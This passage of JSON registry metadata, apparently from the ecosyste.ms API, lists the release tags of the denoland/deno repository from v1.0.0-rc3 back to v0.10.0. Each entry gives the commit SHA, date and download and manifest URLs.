/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:1